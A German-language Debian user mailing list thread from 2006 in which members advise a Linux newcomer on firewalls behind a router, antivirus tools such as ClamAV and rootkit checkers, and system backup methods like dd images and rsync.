On 24.03.06 08:50:24, [EMAIL PROTECTED] wrote: > Am Freitag, 24. März 2006 01:18 schrieb Andreas Pakulat: > > Machen wir das mal als erstes. Es ist hier üblich den eigenen Realnamen > > in den Absender zu schreiben. Weiterhin solltest du dir die am Ende > > jeder Mail erwähnte FAQ anschauen. Und wenn du antwortest kein ToFu > > (Text oben Full Quote unten) produzieren. > > Dann hoffe ich, dass ich mit meiner Realname-Adresse nun auch in die Liste > komme, sonst muss ich mich vermutlich neu anmelden. Ich probiere das jetzt > mal so ohne. Eigentlich nicht, aber es funktioniert anscheinend schon. Gemeint war dennoch eher sowas wie "Andrea Bayer" <[EMAIL PROTECTED]> Aber mir ists eigentlich auch egal, nur manchen anderen Listenteilnehmern stösst das übel auf... > > Die meisten Programme haben eine manpage. Weitere Dokumentation findet > > sich in /usr/share/doc/. Manche Pakete haben ein extra > > -doc-Paket. Ansonsten findet man mit Google recht häufig was... > > Ich hab leider den Namen vergessen, aber es soll auch ein Programm geben, > dass > noch weitere Unterkategorien enthält, als die, die die z.B. Synaptic anzeigt Das verstehe ich jetzt nicht ganz. Die Anzeige und Kategorisierung in synaptic oder aptitude hat nichts damit zu tun wo du Dokumentation findest. Sobald du Paket X aus welcher Kategorie (z.B. documentation) installierst ist ein Teil der dazugehörigen Dokumentation in /usr/share/doc/X/, dazu gehören neben den changelogs auch eine README.Debian die debianspezifische Eigenheiten erklärt sowie sämtliche README und anderen Dokumente die vom Original-Author mitgeliefert wurden. > > Images vom eigenen System kann man z.B. mit dd machen und dann später > > mit einer Knoppix oder anderen Live-CD zurueckspielen. Kein Grund für > > eine Diskette (ausser du hast kein CD-Laufwerk). Insbesondere hast du > > mit einer Live-CD mehr Tools die du nutzen kannst... > > Das geht? Damit werde ich mich befassen. Klaro, dd kopiert allerdings auch leeren Platz mit, das entstehende Image wird also genausogross wie die Originalpartition. Daneben kenne ich noch partimage dass noch eine Komprimierung durchführt. Persönlich sichere ich einfach mittels rsync/rsnapshot auf einen anderen Rechner. Damit hab ich nicht das Problem das irgendein "Archiv" kaputt gehen kann und ich kann jederzeit auf die Daten zugreifen. Natürlich braucht man dann mehr Platz... > > Ähm, ich rate dir _dringend_ eine Neuinstallation mit Sarge > > durchzuführen. Mit Unstable wirst du vmtl. nicht gluecklich werden, > > ausser du hast zuviel Freizeit... > > Sarge hat noch kein xorg. Ich werde jedenfalls nicht jedes update aufspielen, > bislang läuft testing ruhig. Wozu brauchst du auf der Kiste Xorg? > > > Pentium III 128MB, PCI > > > > Hmm, ich hoffe da sollen keine grossen Anwendungen laufen? > > Es ist erst mal mein Altrechner, der unter Windows im Grunde nur noch ein > großes Archiv enthält. Ich hab ihn genommen, um mich darauf überhaupt an > Linux zu wagen, sobald ich darin fitter bin, kommen die anderen Rechner an > die Reihe. Dieser hier muss nur die Grundkonfiguration halten, wie sie in den > anderen dann als Basis enthalten ist. Ahso. > Doch noch eine Frage. Viele halten Antivirensoftware nicht für notwendig. Ist > diese Notwendigkeit nicht bereits durch den E-Mail-Empfang gegeben? Und wenn > nicht, weshalb nicht? Dat kommt drauf an. Wenn du mit Linux Emails empfängst die anschliessend auf einem Windowssystem gelesen werden sollen (also quasi nen Mailserver betreibst) dann solltest du definitiv einen Virenscanner drüberjagen. Solange du aber nur Linuxsysteme zum Mail lesen benutzt ist das _noch_ ungefährlich. Linux ist momentan nicht so sehr gefährdet, weil es nicht so viel Aufmerksamkeit hat wie Windows, demzufolge gibts schonmal gar nicht so viele Viren/Würmer usw... Weiterhin wird oft angeführt, dass man unter Linux eigentlich immer einen unpriveligierten Account benutzt zum arbeiten. Demzufolge verlierst du eigentlich nur deine eigenen Daten wenn der Virus zuschlägt... Allerdings sollte man auch unter Linux beim Surfen aufpassen, Phishing und Bugs im Browser gibts auch hier. Andreas -- Good night to spend with family, but avoid arguments with your mate's new lover. -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject "unsubscribe". Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Hallo, [EMAIL PROTECTED] wrote: > Doch noch eine Frage. Viele halten Antivirensoftware nicht für notwendig. Ist > diese Notwendigkeit nicht bereits durch den E-Mail-Empfang gegeben? Und wenn > nicht, weshalb nicht? E-Mails sind nur Text. Der ist an sich nicht schädlich. Viele Probleme sind dadurch entstanden, dass bestimmte Mailprogramme von Microsoft automatisch und ohne Nachfrage Anhänge ausführen. Ich kennen keinen E-Mailclient unter Linux, der das machen würde. Außerdem habe ich in den ca. 3-4 Jahren, in denen ich Linux als mein Hauptsystem verwende, keinen einzigen Virus bekommen, der unter Linux lauffähig wäre. Dazu hätte ich wine starten müssen, und selbst dann hätten die meisten vermutlich nicht funktioniert. Führe einfach keine Ausführbaren Dateien aus, die du per Mail bekommst, dann passiert dir nichts. Grüße, Moritz -- Moritz Lenz http://moritz.faui2k3.org/ signature.asc Description: OpenPGP digital signature
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Freitag, 24. März 2006 01:18 schrieb Andreas Pakulat: > Machen wir das mal als erstes. Es ist hier üblich den eigenen Realnamen > in den Absender zu schreiben. Weiterhin solltest du dir die am Ende > jeder Mail erwähnte FAQ anschauen. Und wenn du antwortest kein ToFu > (Text oben Full Quote unten) produzieren. Dann hoffe ich, dass ich mit meiner Realname-Adresse nun auch in die Liste komme, sonst muss ich mich vermutlich neu anmelden. Ich probiere das jetzt mal so ohne. > Damit ist dein Rechner aus dem Internet nicht > mehr direkt erreichbar, es sei denn du hast deinen Router so > eingerichtet dass bestimmte Dienste auf deinen Rechner weitergeleitet > werden. Nein, es gibt keine Dienste, die auf meinen Rechner weitergeleitet werden. Ich werde mir die Firewall sparen, hab eher Bammel, dass ich mich damit selbst ausschließe. > Die meisten Programme haben eine manpage. Weitere Dokumentation findet > sich in /usr/share/doc/. Manche Pakete haben ein extra > -doc-Paket. Ansonsten findet man mit Google recht häufig was... Ich hab leider den Namen vergessen, aber es soll auch ein Programm geben, dass noch weitere Unterkategorien enthält, als die, die die z.B. Synaptic anzeigt > Images vom eigenen System kann man z.B. mit dd machen und dann später > mit einer Knoppix oder anderen Live-CD zurueckspielen. Kein Grund für > eine Diskette (ausser du hast kein CD-Laufwerk). Insbesondere hast du > mit einer Live-CD mehr Tools die du nutzen kannst... Das geht? Damit werde ich mich befassen. > Ähm, ich rate dir _dringend_ eine Neuinstallation mit Sarge > durchzuführen. Mit Unstable wirst du vmtl. nicht gluecklich werden, > ausser du hast zuviel Freizeit... Sarge hat noch kein xorg. Ich werde jedenfalls nicht jedes update aufspielen, bislang läuft testing ruhig. > > Pentium III 128MB, PCI > > Hmm, ich hoffe da sollen keine grossen Anwendungen laufen? Es ist erst mal mein Altrechner, der unter Windows im Grunde nur noch ein großes Archiv enthält. Ich hab ihn genommen, um mich darauf überhaupt an Linux zu wagen, sobald ich darin fitter bin, kommen die anderen Rechner an die Reihe. Dieser hier muss nur die Grundkonfiguration halten, wie sie in den anderen dann als Basis enthalten ist. > Was sich für Debian-Einsteiger sehr gut eignet ist > > www.debiananwenderhandbuch.de Das ist wirklich gut, hat mir auch schon sehr geholfen. Danke für Eure zahlreichen Antworten. Doch noch eine Frage. Viele halten Antivirensoftware nicht für notwendig. Ist diese Notwendigkeit nicht bereits durch den E-Mail-Empfang gegeben? Und wenn nicht, weshalb nicht? Gruß Andrea
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Matthias Haegele schrieb: > [EMAIL PROTECTED] schrieb: > > 1.) Brauche ich hinter der Firewall des Routers noch eine weitere > > Firewall, bei Windows XP war die ja fast ein Muss. > Wenn dann nimm einen FW-Builder o.ä. wenn du wenig Erfahrung damit hast. Ich kann da Shorewall empfehlen. Aber nimm einen aktuellen Release, der von sarge ist AFAIK mittlerweile wieder veraltet... > > 2.) Welche Antiviren-Software ist empfehlenswert. > Kannste kostenlos clamav nehmen, Kann ich auch empfehlen, der filtert mir eigentlich alles weg, hab ihn auch als "clamwin" unter Win98 für meine Eltern sehr erfolgreich am laufen. ;) -- MfG Jan OpenPGP Fingerprint: 0E9B 4052 C661 5018 93C3 4E46 651A 7A28 4028 FF7A pgpfUCqtsM6lY.pgp Description: PGP signature
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
On 23.03.06 23:39:53, [EMAIL PROTECTED] wrote: > zuerst bitte ich um Eure Nachsicht bzw. um Hinweise, falls ich den > Konventionen einer Mailingliste aus reiner Unerfahrenheit nicht entspreche. Machen wir das mal als erstes. Es ist hier üblich den eigenen Realnamen in den Absender zu schreiben. Weiterhin solltest du dir die am Ende jeder Mail erwähnte FAQ anschauen. Und wenn du antwortest kein ToFu (Text oben Full Quote unten) produzieren. > 1.) Brauche ich hinter der Firewall des Routers noch eine weitere Firewall, > bei Windows XP war die ja fast ein Muss. Wenn ja, ... Das kommt drauf an. Im Normalfall sind Linuxprogramme bei weitem nicht so gesprächig wie Windowsprogramme, weswegen man i.A. nicht kontrollieren muss welche Programme eine Internetverbindung aufmachen. Was die eingehenden Verbindungen angeht so ist ein Router alleine schon ein recht guter Schutz. Damit ist dein Rechner aus dem Internet nicht mehr direkt erreichbar, es sei denn du hast deinen Router so eingerichtet dass bestimmte Dienste auf deinen Rechner weitergeleitet werden. > b) ist eine Anleitung verfügbar oder muss ich Foren und Mailingliste zur > Konfiguration belagern. Die meisten Programme haben eine manpage. Weitere Dokumentation findet sich in /usr/share/doc/. Manche Pakete haben ein extra -doc-Paket. Ansonsten findet man mit Google recht häufig was... > 2.) Welche Antiviren-Software ist empfehlenswert. Das ist für Linux zwar noch nicht so akut, aber da weiss Google bestimmt was. > 3.) Ich brauche ein Programm, mit dem ich eine 1.4 MB große Bootdisk > erstellen > kann, über die sich Backups des Systems auf einer gesonderten Partition > aufrufen lassen, um zur Not auch das gesamte System wieder herstellen zu > können. Optimal wäre, wenn dieses Programm Änderungen aufzeichnete, so dass > ich steuern kann, welches Backup zurückzuspielen wäre, ähnlich der > Systemwiederherstellung unter Windows. Da müssen andere in die Bresche springen, ich mache mein Backup immer auf einen 2. Rechner. Wiederherstellung des Systems würde mittels Neuinstallation und anschliessendem (halbautomatischem) Neueinspielen der Pakete erfolgen. Images vom eigenen System kann man z.B. mit dd machen und dann später mit einer Knoppix oder anderen Live-CD zurueckspielen. Kein Grund für eine Diskette (ausser du hast kein CD-Laufwerk). Insbesondere hast du mit einer Live-CD mehr Tools die du nutzen kannst... > Linux version 2.6.15-1-486 (Debian 2.6.15-8) ([EMAIL PROTECTED]) (gcc version > 4.0.3 20060212 (prerelease) (Debian 4.0.2-9)) #2 Mon Mar 6 15:19:16 UTC 2006 Ähm, ich rate dir _dringend_ eine Neuinstallation mit Sarge durchzuführen. Mit Unstable wirst du vmtl. nicht gluecklich werden, ausser du hast zuviel Freizeit... > Pentium III 128MB, PCI Hmm, ich hoffe da sollen keine grossen Anwendungen laufen? Was sich für Debian-Einsteiger sehr gut eignet ist www.debiananwenderhandbuch.de auch in gedruckter Form erhältlich. Andreas -- Someone whom you reject today, will reject you tomorrow. -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject "unsubscribe". Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
[...] Mich erschlägt noch die Vielfalt der Pakete, die ich installieren kann. Daher verschiedene Fragen: Es gab doch da mal so ein Paket "Popularity Contest" o. ä., einfach fragen je nach Einsatzzweck gibt es meist mehrere gute Tools, apt-cache search oder aptitude hilft auch manchmal ... Grad nochmal nachgeschaut, da kann man dann nach Bereichen die am häufigsten installierten Programme ansehen ob die "Untermenge" die popularity-contest einsetzen, relevant ist k.A.: http://popcon.debian.org/ [...] NP & HTH MH
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Donnerstag, den 23.03.2006, 23:39 +0100 schrieb [EMAIL PROTECTED]: > Hallo, > > zuerst bitte ich um Eure Nachsicht bzw. um Hinweise, falls ich den > Konventionen einer Mailingliste aus reiner Unerfahrenheit nicht entspreche. > > Mich erschlägt noch die Vielfalt der Pakete, die ich installieren kann. Daher > verschiedene Fragen: > > 1.) Brauche ich hinter der Firewall des Routers noch eine weitere Firewall, > bei Windows XP war die ja fast ein Muss. Wenn ja, ... Als reiner Desktop-PC? Ne. > 2.) Welche Antiviren-Software ist empfehlenswert. Eigentlich brauchst Du ja keine, aber wenn Du unbedingt auf Nummer sicher gehen willst: Clamav, Bitdefender, Anitvir, chkrootkit[1], rkhunter[1], fprot ;) [1] sind keine Virenscanner im eigentlichen Sinne. Diese Tools überprüfen das System auf das Vorhandensein eines Rootkits. Ich benutze alle auf meinem Server. Auf meinen Desktops findet sich nichts dergleichen. > 3.) Ich brauche ein Programm, mit dem ich eine 1.4 MB große Bootdisk > erstellen > kann, über die sich Backups des Systems auf einer gesonderten Partition > aufrufen lassen, um zur Not auch das gesamte System wieder herstellen zu > können. Optimal wäre, wenn dieses Programm Änderungen aufzeichnete, so dass > ich steuern kann, welches Backup zurückzuspielen wäre, ähnlich der > Systemwiederherstellung unter Windows. Huch Disketten? Flexbackup wäre eine Möglichkeit. Dar vielleicht auch noch. Gruß -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject "unsubscribe". Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
[EMAIL PROTECTED] schrieb: Hallo, Hallo!. zuerst bitte ich um Eure Nachsicht bzw. um Hinweise, falls ich den Konventionen einer Mailingliste aus reiner Unerfahrenheit nicht entspreche. Mich erschlägt noch die Vielfalt der Pakete, die ich installieren kann. Daher verschiedene Fragen: Es gab doch da mal so ein Paket "Popularity Contest" o. ä., einfach fragen je nach Einsatzzweck gibt es meist mehrere gute Tools, apt-cache search oder aptitude hilft auch manchmal ... 1.) Brauche ich hinter der Firewall des Routers noch eine weitere Firewall, bei Windows XP war die ja fast ein Muss. Wenn ja, ... Wenn der Router "nat-et" und die FW soweit funktioniert imho für einen Desktop-PC nicht, solange du keine Dienste ins "Böse Internet" anbietest ... a) welche wäre zu empfehlen (Infos zu meinem PC am Schluss) Wenn dann nimm einen FW-Builder o.ä. wenn du wenig Erfahrung damit hast. b) ist eine Anleitung verfügbar oder muss ich Foren und Mailingliste zur Konfiguration belagern. 2.) Welche Antiviren-Software ist empfehlenswert. Kannste kostenlos clamav nehmen, oder antivir von http://www.free-av.de/ gibts auch eine Linux-Ver, allerdings afaik nicht als .deb. clamav sollte es aber auch alleine tun. [...] Danke für Eure Hilfe Andrea NP & HTH MH
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Hallo, [EMAIL PROTECTED] wrote: > zuerst bitte ich um Eure Nachsicht bzw. um Hinweise, falls ich den > Konventionen einer Mailingliste aus reiner Unerfahrenheit nicht entspreche. Dann lass dir hiermit freundlich gesagt sein, dass Realnames hier erwünscht sind, und dass du kein Reply-To setzten solltest. > 1.) Brauche ich hinter der Firewall des Routers noch eine weitere Firewall, > bei Windows XP war die ja fast ein Muss. Wenn ja, ... Nein. Meine Meinung. Vielleicht später mal, jetzt solltest du dir keinen Stress deswegen machen. > 2.) Welche Antiviren-Software ist empfehlenswert. Kaum ein Heimanwnder hat auf einem Debiansystem einen Virenscanner, höchstens um Mails zu scannen, die an Windowsrechner weitergeleitet werden. Falls du trotzdem eine willst, kann dir sicher jemand anderes weiterhelfen. Grüße, Moritz -- Moritz Lenz http://moritz.faui2k3.org/ signature.asc Description: OpenPGP digital signature
Neues Mitglied - Fragen zu Sicherheitskomponenten
Hallo, zuerst bitte ich um Eure Nachsicht bzw. um Hinweise, falls ich den Konventionen einer Mailingliste aus reiner Unerfahrenheit nicht entspreche. Mich erschlägt noch die Vielfalt der Pakete, die ich installieren kann. Daher verschiedene Fragen: 1.) Brauche ich hinter der Firewall des Routers noch eine weitere Firewall, bei Windows XP war die ja fast ein Muss. Wenn ja, ... a) welche wäre zu empfehlen (Infos zu meinem PC am Schluss) b) ist eine Anleitung verfügbar oder muss ich Foren und Mailingliste zur Konfiguration belagern. 2.) Welche Antiviren-Software ist empfehlenswert. 3.) Ich brauche ein Programm, mit dem ich eine 1.4 MB große Bootdisk erstellen kann, über die sich Backups des Systems auf einer gesonderten Partition aufrufen lassen, um zur Not auch das gesamte System wieder herstellen zu können. Optimal wäre, wenn dieses Programm Änderungen aufzeichnete, so dass ich steuern kann, welches Backup zurückzuspielen wäre, ähnlich der Systemwiederherstellung unter Windows. Danke für Eure Hilfe Andrea -- Linux version 2.6.15-1-486 (Debian 2.6.15-8) ([EMAIL PROTECTED]) (gcc version 4.0.3 20060212 (prerelease) (Debian 4.0.2-9)) #2 Mon Mar 6 15:19:16 UTC 2006 Pentium III 128MB, PCI :00:00.0 Host bridge: Intel Corporation 82815 815 Chipset Host Bridge and Memory Controller Hub (rev 04) :00:01.0 PCI bridge: Intel Corporation 82815 815 Chipset AGP Bridge (rev 04) :00:1e.0 PCI bridge: Intel Corporation 82801AA PCI Bridge (rev 02) :00:1f.0 ISA bridge: Intel Corporation 82801AA ISA Bridge (LPC) (rev 02) :00:1f.1 IDE interface: Intel Corporation 82801AA IDE (rev 02) :00:1f.2 USB Controller: Intel Corporation 82801AA USB (rev 02) :00:1f.5 Multimedia audio controller: Intel Corporation 82801AA AC'97 Audio (rev 02) :01:00.0 VGA compatible controller: nVidia Corporation NV5M64 [RIVA TNT2 Model 64/Model 64 Pro] (rev 15) :02:08.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) :02:0a.0 Communication controller: Agere Systems LT WinModem (rev 02)
